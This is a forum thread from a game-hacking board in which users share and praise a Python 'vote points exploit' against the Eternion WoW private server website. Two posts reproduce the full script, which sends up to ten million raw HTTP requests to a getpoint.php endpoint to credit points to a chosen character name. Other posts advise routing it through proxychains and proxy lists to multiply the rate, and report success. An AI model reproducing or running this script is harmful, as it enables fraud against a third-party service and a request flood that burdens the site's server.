Eternion wow vote points public now... menu

User Tag List

Page 1 of 15 12345 ... LastLast
Results 1 to 15 of 224
  1. #1
    karapidiola's Avatar Active Member
    Reputation
    51
    Join Date
    Mar 2008
    Posts
    166
    Thanks G/R
    1/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    wow vote points public now...[2 more realms added]

    removed for safety
    if a mod can remove the posts with the code inside it will be better
    Last edited by karapidiola; 02-25-2009 at 09:19 AM.

    Eternion wow vote points public now...
  2. #2
    supermagma's Avatar Active Member
    Reputation
    16
    Join Date
    Jun 2008
    Posts
    438
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    virus scan

    it does seem suspiciuos...please someone test

  3. #3
    karapidiola's Avatar Active Member
    Reputation
    51
    Join Date
    Mar 2008
    Posts
    166
    Thanks G/R
    1/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    super u are script kiddie or what? python scripts are open source u can open with notepad and see the ****ing source code who will write trojans/backdors/malware in python hahaha

  4. #4
    ZomgZippo's Avatar Member
    Reputation
    4
    Join Date
    Aug 2007
    Posts
    53
    Thanks G/R
    3/2
    Trade Feedback
    11 (100%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    for anyone wondering what's in it

    Code:
    #coding by DarkInjection And Post_Mortem Crew
    #from friends to friends
    #anyway this program just use a request that i have found in the site : eternion-wow.com
    #u can call it "bug" in our case getpoint.php this!!!!
    #so lets get the advantage of this bug and exploit the points:)
    #i hope this will be keept.... private.....
    #start....
    #btw this program its used to be run under linux cos u need a program called proxychains example: proxychains python vote_hack.py
    #posible can work in windows to.....
    
    from socket import *
    from time import sleep
    
    target = 'www.eternion-wow.com'
    port = 80
    request_pt1 = '/getpoint.php?url=xtremetop200&char='
    request_pt2 = '&sn=1234809692227'
    
    print('[-]getpoint.php Vote Points Exploit By DarkInjection')
    print('[-]Usage Its Simple Just Give The Name To Add Some Points And Thats It')
    print('[-]Not Every Request Mean A Point Maybe 45 Requests = 1-3 points....\n')
    name = raw_input('[*]Enter The Name To Vote Exploit: ')
    if(len(name) > 0):
        print('[-]Name : '+name)
    else:
        print('Name Its Empty??WTF....')
        exit(1)
    #top200    
    server_request ='GET '
    server_request +=request_pt1
    server_request +=name
    server_request +=request_pt2
    server_request +=' HTTP/1.1\r\n'
    server_request +='Host: '+target+'\r\n'
    server_request +='User-Agent: Mozilla/5.0\r\n'
    server_request +='Keep-Alive: 300\r\n'
    server_request +='Connection: Keep-Alive\r\n\r\n'
    #server_request +='Cookie: PHPSESSID=b98fd4a3e307a1f63c71d02cb5dfbfe3; TIMEA=1234809690; TYPEA=94.71.240.1901\r\n\r\n'
    count = 10000000
    print('[*]Requesting The Server ! This Maybe Take A Wile...')
    for i in range(0,int(count)):
        try:
            i = socket(AF_INET,SOCK_STREAM)
        except:
            print('[/]Error In SOcket Function')
            exit(1)
        try:
            i.connect((target,int(port)))
        except:
            print('[/]Error In Connect()')
            exit(1)
        try:
            i.send(server_request)
        except:
            print('[/]Error In Send()')
            exit(1)

  5. #5
    karapidiola's Avatar Active Member
    Reputation
    51
    Join Date
    Mar 2008
    Posts
    166
    Thanks G/R
    1/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    ZomgZippo you can post if it works(im sure it does....)

  6. #6
    ZomgZippo's Avatar Member
    Reputation
    4
    Join Date
    Aug 2007
    Posts
    53
    Thanks G/R
    3/2
    Trade Feedback
    11 (100%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Before actually bothering. How many points do you get

  7. #7
    karapidiola's Avatar Active Member
    Reputation
    51
    Join Date
    Mar 2008
    Posts
    166
    Thanks G/R
    1/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    90 points in almost 3 hours maybe more
    if u are using proxychains and got a huge proxy list u can make x5 points faster so 450 points in 3 hours...
    for fast points u need also a good bandwith

  8. #8
    ZomgZippo's Avatar Member
    Reputation
    4
    Join Date
    Aug 2007
    Posts
    53
    Thanks G/R
    3/2
    Trade Feedback
    11 (100%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Meh Eternion WoW is crap anyway. Thanks for sharing though

  9. #9
    Zaff's Avatar Member
    Reputation
    6
    Join Date
    Aug 2007
    Posts
    16
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    The serv is epic fail.. Thanks anyway for the release +Rep

  10. #10
    AngshumanSSJV's Avatar Member
    Reputation
    65
    Join Date
    May 2008
    Posts
    519
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Mediafire links please?

    Everyone, stop posting EternionWoW/WoWAXA/AntWoW exploits/hacks.. cause the fking site n00bs i.e. Fuzzymini is here.

  11. #11
    Vragoth's Avatar Established Member
    Reputation
    55
    Join Date
    Nov 2008
    Posts
    422
    Thanks G/R
    5/1
    Trade Feedback
    1 (100%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Thanks for the contribution to the community!

  12. #12
    bart_bart's Avatar Member
    Reputation
    9
    Join Date
    Jun 2007
    Posts
    52
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    abit slow, but works
    and thx for the quick response +rep
    btw here is a rapid fire link
    http://www.mediafire.com/?sharekey=d...4e75f6e8ebb871

    or copy this into notepad and save it with a .py extention

    Code:
    #coding by DarkInjection And Post_Mortem Crew
    #from friends to friends
    #anyway this program just use a request that i have found in the site : eternion-wow.com
    #u can call it "bug" in our case getpoint.php this!!!!
    #so lets get the advantage of this bug and exploit the points:)
    #i hope this will be keept.... private.....
    #start....
    #btw this program its used to be run under linux cos u need a program called proxychains example: proxychains python vote_hack.py
    #posible can work in windows to.....
    
    from socket import *
    from time import sleep
    
    target = 'www.eternion-wow.com'
    port = 80
    request_pt1 = '/getpoint.php?url=xtremetop200&char='
    request_pt2 = '&sn=1234809692227'
    
    print('[-]getpoint.php Vote Points Exploit By DarkInjection')
    print('[-]Usage Its Simple Just Give The Name To Add Some Points And Thats It')
    print('[-]Not Every Request Mean A Point Maybe 45 Requests = 1-3 points....\n')
    name = raw_input('[*]Enter The Name To Vote Exploit: ')
    if(len(name) > 0):
    	print('[-]Name : '+name)
    else:
    	print('Name Its Empty??WTF....')
    	exit(1)
    #top200	
    server_request ='GET '
    server_request +=request_pt1
    server_request +=name
    server_request +=request_pt2
    server_request +=' HTTP/1.1\r\n'
    server_request +='Host: '+target+'\r\n'
    server_request +='User-Agent: Mozilla/5.0\r\n'
    server_request +='Keep-Alive: 300\r\n'
    server_request +='Connection: Keep-Alive\r\n\r\n'
    #server_request +='Cookie: PHPSESSID=b98fd4a3e307a1f63c71d02cb5dfbfe3; TIMEA=1234809690; TYPEA=94.71.240.1901\r\n\r\n'
    count = 10000000
    print('[*]Requesting The Server ! This Maybe Take A Wile...')
    for i in range(0,int(count)):
    	try:
    		i = socket(AF_INET,SOCK_STREAM)
    	except:
    		print('[/]Error In SOcket Function')
    		exit(1)
    	try:
    		i.connect((target,int(port)))
    	except:
    		print('[/]Error In Connect()')
    		exit(1)
    	try:
    		i.send(server_request)
    	except:
    		print('[/]Error In Send()')
    		exit(1)
    Last edited by bart_bart; 02-17-2009 at 09:10 PM.

  13. #13
    gunite69's Avatar Member
    Reputation
    12
    Join Date
    Dec 2008
    Posts
    110
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    does toher servers does this owrk on?

  14. #14
    sofsof's Avatar Member
    Reputation
    1
    Join Date
    Apr 2007
    Posts
    1
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Who have a good proxy list please ?

  15. #15
    karapidiola's Avatar Active Member
    Reputation
    51
    Join Date
    Mar 2008
    Posts
    166
    Thanks G/R
    1/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    guyz last night i GOT 'Your Vote Points: 16667' i dont know but now its faster than before
    my points increased by 50 evey sec lol :P

Page 1 of 15 12345 ... LastLast

Similar Threads

  1. eternion-wow vote hack
    By supernova1 in forum WoW EMU Questions & Requests
    Replies: 2
    Last Post: 05-01-2010, 09:45 AM
  2. eternion-wow vote hack
    By supernova1 in forum WoW Bots Questions & Requests
    Replies: 1
    Last Post: 05-01-2010, 09:42 AM
  3. Eternion-wow vote points exploid.
    By ludterror in forum WoW EMU Exploits & Bugs
    Replies: 2
    Last Post: 04-02-2010, 12:46 PM
  4. Eternion-wow Vote Expolit
    By knazze in forum WoW EMU Exploits & Bugs
    Replies: 5
    Last Post: 12-03-2009, 05:24 AM
All times are GMT -5. The time now is 02:59 PM. Powered by vBulletin® Version 4.2.3
Copyright © 2024 vBulletin Solutions, Inc. All rights reserved. User Alert System provided by Advanced User Tagging (Pro) - vBulletin Mods & Addons Copyright © 2024 DragonByte Technologies Ltd.
Digital Point modules: Sphinx-based search